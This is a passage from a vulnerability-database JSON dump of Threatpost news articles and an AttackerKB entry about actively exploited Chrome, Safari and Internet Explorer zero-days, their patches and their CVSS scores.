Find out: Join experts from SpyCloud and Threatpost senior editor Tara Seals on our upcoming free **_[_**Threatpost webinar**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**, \u201cTrends in Fortune 1000 Breach Exposure.\u201d **_[_**Click here to register**_](<https://attendee.gotowebinar.com/register/3127445778613605890?source=ART>)_**.**_\n", "cvss3": {}, "published": "2019-11-01T15:35:03", "type": "threatpost", "title": "Google Discloses Chrome Flaw Exploited in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2019-13721", "CVE-2019-5869"], "modified": "2019-11-01T15:35:03", "id": "THREATPOST:74F8E9B3D3CB64CAF2AF0B54DE29C9A6", "href": "https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-15T11:25:30", "description": "Threat actors used a Safari zero-day flaw to send malicious links to government officials in Western Europe via LinkedIn before researchers from Google discovered and reported the vulnerability.\n\nThat\u2019s the word from researchers from Google Threat Analysis Group (TAG) and Google Project Zero, who Wednesday [posted a blog](<https://blog.google/threat-analysis-group/how-we-protect-users-0-day-attacks/>) shedding more light on several zero-day flaws that they discovered so far this year. 
Researchers in particular detailed how attackers exploited the vulnerabilities \u2013 the prevalence of which is on the rise \u2013 before they were addressed by their respective vendors.\n\nTAG researchers discovered the Safari WebKit flaw, tracked as [CVE-2021-1879](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-1879>), on March 19. The vulnerability allowed for the processing of maliciously crafted web content for universal cross-site scripting and was addressed by Apple in [an update](<https://support.apple.com/en-us/HT212256>) later that month.\n\nBefore the fix, researchers assert that Russian-language threat actors were exploiting the vulnerability in the wild by using LinkedIn Messaging to send government officials from Western European countries malicious links that could collect website-authentication cookies, according to the post by Maddie Stone and Clement Lecigne from Google TAG.\n\n\u201cIf the target visited the link from an iOS device, they would be redirected to an attacker-controlled domain that served the next-stage payloads,\u201d they wrote.\n\nThe exploit, which targeted iOS versions 12.4 through 13.7, would turn off [Same-Origin-Policy](<https://en.wikipedia.org/wiki/Same-origin_policy>) protections on an infected device to collect authentication cookies from several popular websites \u2013 including Google, Microsoft, LinkedIn, Facebook and Yahoo \u2013 and then send them via WebSocket to an attacker-controlled IP, researchers wrote. The victim would need to have a session open on these websites from Safari for cookies to be successfully exfiltrated.\n\nMoreover, the campaign targeting iOS devices coincided with others from the same threat actor \u2013 which Microsoft has identified as Nobelium \u2013 targeting users on Windows devices to deliver Cobalt Strike, researchers wrote. 
Security firm Volexity described one of these attacks [in a report](<https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/>) posted online in May, the researchers added.\n\nNobelium is believed to be a Russia-based threat group responsible for the [expansive cyber-espionage SolarWinds](<https://threatpost.com/feds-russia-culprit-solarwinds/162785/>) campaign, which affected numerous U.S. government agencies and tech companies, including Microsoft.\n\n## **Other Zero-Day Attacks**\n\nGoogle researchers also linked three additional zero-day flaws they identified this year to a commercial surveillance vendor, according to [Google TAG\u2019s Shane Huntley](<https://twitter.com/ShaneHuntley/status/1415340345500463113>). Two of those vulnerabilities \u2013 [CVE-2021-21166](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21166>) and [CVE-2021-30551](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30551>) \u2013 were found in Chrome, and one, tracked as [CVE-2021-33742](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-33742>), in Internet Explorer.\n\nCVE-2021-21166 and CVE-2021-30551, two Chrome renderer remote-code execution (RCE) flaws, were identified separately but are later believed to have been used by the same actor, researchers wrote in the blog. Google researchers discovered the former in February and the latter in June.\n\n\u201cBoth of these 0-days were delivered as one-time links sent by email to the targets, all of whom we believe were in Armenia,\u201d Stone and Lecigne wrote. \u201cThe links led to attacker-controlled domains that mimicked legitimate websites related to the targeted users.\u201d\n\nWhen prospective victims clicked the link, they were redirected to a webpage that would fingerprint their device, collect system information about the client, and generate ECDH keys to encrypt the exploits, researchers wrote. 
This info \u2013 which included screen resolution, timezone, languages, browser plugins, and available MIME types \u2013 would then be sent back to the exploit server and used by attackers to decide whether or not an exploit should be delivered to the target, they said.\n\nResearchers also identified a separate campaign in April that also targeted Armenian users by leveraging CVE-2021-26411, an RCE bug found in Internet Explorer (IE). The campaign delivered malicious Office documents that loaded web content within IE, researchers wrote.\n\n\u201cThis happened by either embedding a remote ActiveX object using a Shell.Explorer.1 OLE object or by spawning an Internet Explorer process via VBA macros to navigate to a web page,\u201d Stone and Lecigne explained.\n\nAt the time, researchers said they were unable to recover the next-stage payload, but successfully recovered the exploit after discovering an early June campaign from the same actors. Microsoft patched the flaw later that month, they said.\n\nCredit: TAG\n\n## **Why Is There an Increase in Zero-Days?**\n\nAll in all, security researchers have identified 33 [zero-day flaws](<https://threatpost.com/kaseya-patches-zero-days-revil-attacks/167670/>) so far in 2021, which is 11 more than the total number from 2020, according to the post.\n\nWhile that trend reflects an increase in the number of these types of vulnerabilities that exist, Google researchers \u201cbelieve greater detection and disclosure efforts are also contributing to the upward trend,\u201d they wrote.\n\nStill, it\u2019s highly possible that attackers are indeed using more [zero-day exploits](<https://threatpost.com/zero-day-wipe-my-book-live/167422/>) for a few reasons, researchers noted. 
One is that the increase and maturation of security technologies and features means attackers also have to level up, which in turn requires more [zero-day vulnerabilities](<https://threatpost.com/solarwinds-hotfix-zero-day-active-attack/167704/>) for functional attack chains, they said.\n\nThe growth of mobile platforms also has resulted in an increase in the number of products that threat actors want to target\u2014hence more reason to use zero-day exploits, researchers observed. Perhaps inspired by this increase in demand, commercial vendors also are selling more access to zero-days than in the early 2010s, they said.\n\nFinally, the maturation of security protections and strategies also inspires sophistication on the part of attackers as well, boosting the need for them to use zero-day flaws to convince victims to install malware, researchers noted.\n\n\u201cDue to advancements in security, these actors now more often have to use 0-day exploits to accomplish their goals,\u201d Stone and Lecigne wrote.\n\n_**Check out our free **_[_**upcoming live and on-demand webinar events**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {}, "published": "2021-07-15T11:04:49", "type": "threatpost", "title": "Safari Zero-Day Used in Malicious LinkedIn Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-1879", "CVE-2021-21166", "CVE-2021-26411", "CVE-2021-30551", "CVE-2021-33742"], "modified": "2021-07-15T11:04:49", "id": "THREATPOST:EA23582BD77C428ACE9B9DB7D5741EB6", "href": "https://threatpost.com/safari-zero-day-linkedin/167814/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-21T12:26:16", "description": "Google released an [update](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) to its Chrome browser that patches a zero-day vulnerability in the software\u2019s 
FreeType font rendering library that was actively being exploited in the wild.\n\nSecurity researcher Sergei Glazunov of [Google Project Zero](<https://googleprojectzero.blogspot.com/>) discovered [the bug](<https://twitter.com/benhawkes/status/1318640422571266048>), which is classified as a type of memory-corruption flaw called a heap buffer overflow in FreeType. Glazunov informed Google of the vulnerability on Monday. Project Zero is an internal security team at the company aimed at finding zero-day vulnerabilities.\n\nBy Tuesday, Google already had released a stable channel update, Chrome version 86.0.4240.111, that deploys five security fixes for Windows, Mac and Linux \u2013 among them a fix for the zero-day, which is being tracked as CVE-2020-15999 and is rated as high risk.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2020-15999 exists in the wild,\u201d Prudhvikumar Bommana of the Google Chrome team wrote in a [blog post](<https://chromereleases.googleblog.com/2020/10/stable-channel-update-for-desktop_20.html>) announcing the update Tuesday. Google did not reveal further details of the active attacks that researchers observed.\n\n[Andrew R. Whalley](<https://twitter.com/arw>), a member of the Chrome security team, gave his team kudos on [Twitter](<https://twitter.com/arw/status/1318640817762807810>) for the \u201csuper-fast\u201d response to the zero-day.\n\nStill, Ben Hawkes, technical lead for the Project Zero team, warned that while Google researchers only observed the Chrome exploit, it\u2019s possible that other implementations of FreeType might be vulnerable as well, since Google was so quick in its response to the bug. 
He referred users to a [fix](<https://savannah.nongnu.org/bugs/?59308>) by Glazunov posted on the FreeType Project page and urged them to update other potentially vulnerable software.\n\n\u201cThe fix is also in today\u2019s stable release of FreeType 2.10.4,\u201d Hawkes [tweeted](<https://twitter.com/benhawkes/status/1318640423485624320>).\n\nMeanwhile, security researchers took to Twitter to encourage people to update their Chrome browsers immediately to avoid falling victim to attackers aiming to exploit the flaw.\n\n\u201cMake sure you update your Chrome today! (restart it!),\u201d [tweeted](<https://twitter.com/securestep9/status/1318679358840754176>) London-based application security consultant Sam Stepanyan.\n\nIn addition to the FreeType zero day, Google patched four other bugs\u2014three of high risk and one of medium risk\u2013in the Chrome update released this week.\n\nThe high-risk vulnerabilities are: CVE-2020-16000, described as \u201cinappropriate implementation in Blink;\u201d CVE-2020-16001, described as \u201cuse after free in media;\u201d and CVE-2020-16002, described as \u201cuse after free in PDFium,\u201d according to the blog post. The medium-risk bug is being tracked as CVE-2020-16003, described as \u201cuse after free in printing,\u201d Bommana wrote.\n\nSo far in the last 12 months Google has patched three zero-day vulnerabilities in its Chrome browser. 
Prior to this week\u2019s FreeType disclosure, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-10-21T12:23:29", "type": "threatpost", "title": "Google Patches Actively-Exploited Zero-Day Bug in Chrome Browser", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-15999", "CVE-2020-16000", "CVE-2020-16001", "CVE-2020-16002", "CVE-2020-16003", "CVE-2020-6418"], "modified": "2020-10-21T12:23:29", "id": "THREATPOST:6F7E512F15913694CF17A906715FE678", "href": "https://threatpost.com/google-patches-zero-day-browser/160393/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-11-04T20:29:51", "description": "Flaws in Google\u2019s Chrome desktop and Android-based browsers were patched Monday in an effort to prevent known exploits from being used by attackers. Two separate security bulletins issued by Google warned that it is aware of reports that exploits for both exist in the wild. Google\u2019s Project Zero went one step further and asserted that both bugs are actively being exploited.\n\nIn its [Chrome browser update](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) for Windows, Mac and Linux, Google said that version 86.0.4240.183 fixes 10 vulnerabilities. Tracked as CVE-2020-16009, this bug is the most troubling, rated high-severity and is one of the two with active exploits. The vulnerability is tied to Google\u2019s open source JavaScript and WebAssembly engine called V8. 
In its disclosure, the flaw is described as an \u201cinappropriate implementation in V8.\u201d\n\nClement Lecigne of Google\u2019s Threat Analysis Group and Samuel Gross of Google Project Zero discovered the Chrome desktop bug on Oct. 29, according to a [blog post](<https://chromereleases.googleblog.com/2020/11/stable-channel-update-for-desktop.html>) announcing the fixes by Prudhvikumar Bommana of the Google Chrome team. If exploited, the V8 bug can be used for remote code execution, according to a separate analysis by Project Zero\u2019s team.\n\nAs for the Android OS-based Chrome browser, also with an active exploit in the wild, Google warned [on Monday](<https://chromereleases.googleblog.com/2020/11/chrome-for-android-update.html>) of a sandbox escape bug (CVE-2020-16010). This vulnerability is rated high-severity and opened up a possible attack based on \u201cheap buffer overflow in UI on Android\u201d conditions. Credited for discovering the bug on Oct. 31 are Maddie Stone, Mark Brand and Sergei Glazunov of Google Project Zero.\n\n## **\u2018Actively Exploited in the Wild\u2019**\n\nGoogle said it was withholding the technical details of both bugs, pending the distribution of patches to affected endpoints. While Google said publicly known exploits existed for both bugs, it did not indicate that either one was under active attack. Google\u2019s own Project Zero technical lead Ben Hawkes tweeted on Monday that both were under active attack.\n\n\u201cToday Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android,\u201d he wrote.\n\n> Today Chrome fixed two more vulnerabilities that were being actively exploited in the wild (discovered by Project Zero/Google TAG last week). 
CVE-2020-16009 is a v8 bug used for remote code execution, CVE-2020-16010 is a Chrome sandbox escape for Android. <https://t.co/IOhFwT0Wx1>\n> \n> \u2014 Ben Hawkes (@benhawkes) [November 2, 2020](<https://twitter.com/benhawkes/status/1323374326150701057?ref_src=twsrc%5Etfw>)\n\nAs a precaution, Google said in its security update that it would \u201calso retain restrictions if the bug exists in a third party library that other projects similarly depend on, but haven\u2019t yet fixed,\u201d according to the post.\n\n## **The Other Android Bugs**\n\nThe new Chrome Android release also includes stability and performance improvements, according to the Google Chrome team.\n\nVulnerabilities patched in the Chrome desktop update included a \u201cuse after free\u201d bug (CVE-2020-16004); an \u201cinsufficient policy enforcement in ANGLE\u201d flaw (CVE-2020-16005); an \u201cinsufficient data validation in installer\u201d issue (CVE-2020-16007) and a \u201cstack buffer overflow in WebRTC\u201d bug (CVE-2020-16008). Lastly, Google reported a \u201cheap buffer overflow in UI on Windows\u201d tracked as CVE-2020-16011.\n\nThis week\u2019s Chrome updates come on the heels of a zero-day bug [reported and patched last week](<https://threatpost.com/google-patches-zero-day-browser/160393/>) by Google affecting Chrome on Windows, Mac and Linux. The flaw (CVE-2020-15999), rated high-risk, is a vulnerability in Chrome\u2019s FreeType font rendering library.\n\nThe latest vulnerabilities mean that in just over 12 months Google has patched a string of serious vulnerabilities in its Chrome browser. 
In addition to the three most recently reported flaws, the first was a critical remote code execution vulnerability [patched last Halloween night](<https://www.zdnet.com/article/halloween-scare-google-discloses-chrome-zero-day-exploited-in-the-wild/>) and tracked as CVE-2019-13720, and the second was a type of memory confusion bug tracked as CVE-2020-6418 that was [fixed in February](<https://threatpost.com/google-patches-chrome-browser-zero-day-bug-under-attack/153216/>).\n", "cvss3": {}, "published": "2020-11-03T17:23:23", "type": "threatpost", "title": "Two Chrome Browser Updates Plug Holes Actively Targeted by Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-13720", "CVE-2020-14750", "CVE-2020-15999", "CVE-2020-16004", "CVE-2020-16005", "CVE-2020-16007", "CVE-2020-16008", "CVE-2020-16009", "CVE-2020-16010", "CVE-2020-16011", "CVE-2020-6418"], "modified": "2020-11-03T17:23:23", "id": "THREATPOST:DF87733B74489628AB9F2C89704380A9", "href": "https://threatpost.com/chrome-holes-actively-targeted/160890/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-14T15:21:25", "description": "Google has addressed two zero-day security bugs that are being actively exploited in the wild.\n\nAs part of the internet giant\u2019s latest stable channel release (version 93.0.4577.82 for Windows, Mac and Linux), it fixed 11 total vulnerabilities, all of them rated high-severity. The two zero days are tracked as CVE-2021-30632 and CVE-2021-30633.\n\n\u201cGoogle is aware that exploits for [these] exist in the wild,\u201d the company said in its short website notice on the update, [issued Monday](<https://chromereleases.googleblog.com/2021/09/stable-channel-update-for-desktop.html>).\n\nGoogle is restricting any technical details \u201cuntil a majority of users are updated with a fix,\u201d it said. The vulnerabilities were reported anonymously, precluding any gleaning of details from the researcher who found them. 
Here\u2019s what we know:\n\n * CVE-2021-30632: Out of bounds write in V8 JavaScript Engine; and\n * CVE-2021-30633: Use after free in the IndexedDB API.\n\nOut-of-bounds write flaws [can result in](<https://cwe.mitre.org/data/definitions/787.html>) corruption of data, a crash or code execution. Use-after-free issues [can result in](<https://cwe.mitre.org/data/definitions/416.html>) any number of attack types, ranging from the corruption of valid data to the execution of arbitrary code. Both bugs have TBD bug-bounty awards attached to them and were reported on Sept. 8.\n\nV8 is Google\u2019s open-source, high-performance JavaScript and WebAssembly engine for Chrome and Chromium-based browsers. It translates JavaScript code into more efficient machine code instead of using an interpreter, which speeds up the web browser. Since this vulnerable component is not specific to Google Chrome, it\u2019s a good bet that other browsers are affected by the bug as well.\n\nIndexedDB, meanwhile, allows users to persistently store large amounts of structured data client-side, inside their browsers. The API is a JavaScript application programming interface provided by web browsers for managing these NoSQL databases. It\u2019s a standard maintained by the World Wide Web Consortium.\n\n\u201cBrowser bugs discovered from exploitation in the wild are among the most significant security threats,\u201d John Bambenek, principal threat hunter at Netenrich, said via email. \u201cNow that they are patched, exploitation will ramp up. That said, almost 20 years on and we haven\u2019t made web browsing safe shows that the rapid embrace of technology continues to leave users exposed to criminals and nation-state actors. Everyone wants to learn how to hack, too few people are working on defense.\u201d\n\nThe other nine bugs addressed by Google are as follows:\n\n * CVE-2021-30625: Use after free in Selection API. 
_Reported by Marcin Towalski of Cisco Talos on 2021-08-06_\n * CVE-2021-30626: Out of bounds memory access in ANGLE. _Reported by Jeonghoon Shin of Theori on 2021-08-18_\n * CVE-2021-30627: Type Confusion in Blink layout. _Reported by Aki Helin of OUSPG on 2021-09-01_\n * CVE-2021-30628: Stack buffer overflow in ANGLE. _Reported by Jaehun Jeong(@n3sk) of Theori on 2021-08-18_\n * CVE-2021-30629: Use after free in Permissions. _Reported by Weipeng Jiang (@Krace) from Codesafe Team of Legendsec at Qi\u2019anxin Group on 2021-08-26_\n * CVE-2021-30630: Inappropriate implementation in Blink. _Reported by SorryMybad (@S0rryMybad) of Kunlun Lab on 2021-08-30_\n * CVE-2021-30631: Type Confusion in Blink layout. _Reported by Atte Kettunen of OUSPG on 2021-09-06_\n\nKevin Dunne, president at Pathlock, pointed out that Google has patched plenty of zero-days already this year \u2013 eight prior to the latest two, to be exact \u2013 and he said to expect more.\n\n## **10th Zero-Day in 2021 for Google**\n\n\u201cToday, Google released a patch for its tenth [and ninth] zero-day exploit of the year,\u201d Dunne said in an email to media. 
\u201cThis milestone highlights the emphasis that bad actors are putting on browser exploits, with Chrome becoming a clear favorite, allowing a streamlined way to gain access to millions of devices regardless of OS.\n\n\u201cWe expect to see continued zero-day exploits in the wild,\u201d he added.\n\nThe other zero days discovered so far in 2021 are as follows, many of them in the V8 engine:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 (February)\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 (March)\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 (March)\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 (April)\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 (April, later [used in Windows attacks](<https://threatpost.com/microsoft-patch-tuesday-in-the-wild-exploits/166724/>))\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013 (June)\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 (June)\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 (July)\n\n\u201cGoogle\u2019s commitment to patching these exploits quickly is commendable, as they operate Google Chrome as freeware and therefore are the sole entity who can provide these updates,\u201d Dunne wrote. \u201cGoogle is committed to providing Chrome as a free browser, as it is a critical entry point for other businesses such as Google Search and Google Workspace.\u201d\n\nThe news comes as Apple [rushed a fix](<https://threatpost.com/apple-emergency-fix-nso-zero-click-zero-day/169416/>) for a zero-click zero-day exploit targeting iMessaging. 
It\u2019s allegedly been used to illegally spy on Bahraini activists with NSO Group\u2019s Pegasus spyware, according to researchers.\n\nMicrosoft is also expected to release its monthly Patch Tuesday set of updates today, so we\u2019ll see if there are yet more zero-day exploits to worry about.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-14T15:03:41", "type": "threatpost", "title": "Pair of Google Chrome Zero-Day Bugs Actively Exploited", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30625", "CVE-2021-30626", "CVE-2021-30627", "CVE-2021-30628", "CVE-2021-30629", "CVE-2021-30630", "CVE-2021-30631", "CVE-2021-30632", "CVE-2021-30633"], "modified": "2021-09-14T15:03:41", "id": "THREATPOST:88DD5812D3C8652E304F32507E4F68DD", "href": "https://threatpost.com/google-chrome-zero-day-exploited/169442/", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-15T21:47:28", "description": "Google on Monday issued 11 security fixes for its Chrome browser, including a high-severity zero-day bug that\u2019s actively being jumped on by attackers in the 
wild.\n\nIn a brief update, Google [described](<https://chromereleases.googleblog.com/2022/02/stable-channel-update-for-desktop_14.html>) the weakness, tracked as [CVE-2022-0609](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0609>), as a [use-after-free](<https://cwe.mitre.org/data/definitions/416.html>) vulnerability in Chrome\u2019s Animation component. This kind of flaw can lead to all sorts of misery, ranging from the corruption of valid data to the execution of arbitrary code on vulnerable systems. Such flaws can also be used to escape the browser\u2019s security sandbox.\n\n\u201cGoogle is aware of reports that an exploit for CVE-2022-0609 exists in the wild,\u201d according to its security update.\n\nChrome users can fix it straight away, though, by going into the Chrome menu > Help > About Google Chrome.\n\nGiven that the zero day is under active attack, updating Chrome should be done ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15125804/Chrome-zero-day-e1644947947750.png>)\n\nChrome security updates. Source: Google.\n\nCredit for the Animation zero day goes to Adam Weidemann and Cl\u00e9ment Lecigne, both from Google\u2019s Threat Analysis Group (TAG).\n\nMonday\u2019s update also plastered over four other high-severity use-after-free flaws found in Chrome\u2019s Webstore API, File Manager, [ANGLE](<https://en.wikipedia.org/wiki/ANGLE_\\(software\\)>) and GPU. As well, the company addressed a high-severity integer overflow in [Mojo](<https://chromium.googlesource.com/chromium/src/+/main/docs/mojo_and_services.md>), plus a high-severity heap buffer overflow in Tab Groups. Finally, Google patched a medium-severity issue with inappropriate implementation in Gamepad API.\n\n## And So It Begins\n\nThis is Chrome\u2019s first zero day of the year, and more are sure to follow. But at least we\u2019ve made it into the new-ish year 10 more days than we managed in 2021, when the first bug to hit arrived on Feb. 
4.\n\nLast year delivered a total of these 16 Chrome zero days:\n\n * [CVE-2021-21148](<https://threatpost.com/google-chrome-zero-day-windows-mac/163688/>) \u2013 Feb. 4, a vulnerability in its V8 open-source web engine.\n * [CVE-2021-21166](<https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/>) \u2013 March 2, a flaw in the Audio component of Google Chrome.\n * [CVE-2021-21193](<https://threatpost.com/google-mac-windows-chrome-zero-day/164759/>) \u2013 March 12, a use-after-free flaw in Blink, [the browser engine for Chrome](<https://threatpost.com/google-high-severity-blink-browser-engine-flaw/147770/>) that was developed as part of the Chromium project.\n * [CVE-2021-21220](<https://threatpost.com/chrome-zero-day-exploit-twitter/165363/>) \u2013 April 13, a remote-code execution issue.\n * [CVE-2021-21224](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21224>) \u2013 April 20, an issue with type confusion in V8 in Google Chrome that could have allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page.\n * [CVE-2021-30551](<https://threatpost.com/chrome-browser-bug-under-attack/166804/>) \u2013 June 9, a type confusion bug within Google\u2019s V8 open-source JavaScript and WebAssembly engine.\n * [CVE-2021-30554](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30554>) \u2013 June 17, a use-after-free bug.\n * [CVE-2021-30563](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30563>) \u2013 July 15, type confusion in V8.\n * [CVE-2021-30632 and CVE-2021-30633](<https://threatpost.com/google-chrome-zero-day-exploited/169442/>) \u2013 Sept. 13, an out-of-bounds write in V8 and a use-after-free bug in the IndexedDB API, respectively.\n * [CVE-2021-37973](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-37973>) \u2013 Sept. 
24, a use-after-free flaw in Portals.\n * [CVE-2021-37976 and CVE-2021-37975](<https://threatpost.com/google-emergency-update-chrome-zero-days/175266/>) \u2013 Sept. 30, an information leak in core and a use-after-free bug in V8, respectively.\n * [CVE-2021-38000](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38000>) and [CVE-2021-38003](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38003>) \u2013 Oct. 28, an issue with Insufficient validation of untrusted input in Intents in Google Chrome on Android, and an inappropriate implementation in V8 respectively.\n * [CVE-2021-4102](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-4102>) \u2013 Dec. 13, a use after free in V8.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T18:33:28", "type": "threatpost", "title": "Chrome Zero-Day Under Active Attack: Patch ASAP", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-4102", "CVE-2021-44228", "CVE-2022-0609"], "modified": "2022-02-15T18:33:28", "id": "THREATPOST:3697F9293A6DFF6CD5927E9E68FF488A", "href": "https://threatpost.com/google-chrome-zero-day-under-attack/178428/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2021-12-09T04:57:03", "description": "Data race in audio in Google Chrome prior to 
89.0.4389.72 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at March 08, 2021 5:47pm UTC reported:\n\nReported as exploited in the wild at <https://threatpost.com/google-patches-actively-exploited-flaw-in-chrome-browser/164468/> and at <https://chromereleases.googleblog.com/2021/03/stable-channel-update-for-desktop.html>.\n\nDetails are still scant on this vulnerability as they are being withheld by Google until more people have patched the issue, which was fixed in Chrome 89.0.4389.72. All that we know is that the bug is labeled as an `Object lifecycle issue in audio` and was found by `Alison Huffman, Microsoft Browser Vulnerability Research on 2021-02-11`.\n\nGiven the description of this vulnerability as well as its link to a similar vulnerability exploited in the wild in the past (see <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/>), it\u2019s likely that this is a UAF vulnerability. Given the one used in <https://threatpost.com/google-discloses-chrome-flaw-exploited-in-the-wild/149784/> was a bug in the same component which was then used in the WizardOpium attacks, it\u2019s likely that this vulnerability will lead to full compromise of the system given past history.\n\nUsers are encouraged to disable JavaScript where possible, particularly for untrusted sites, as this is often needed in order to successfully exploit UAF vulnerabilities in the browser. 
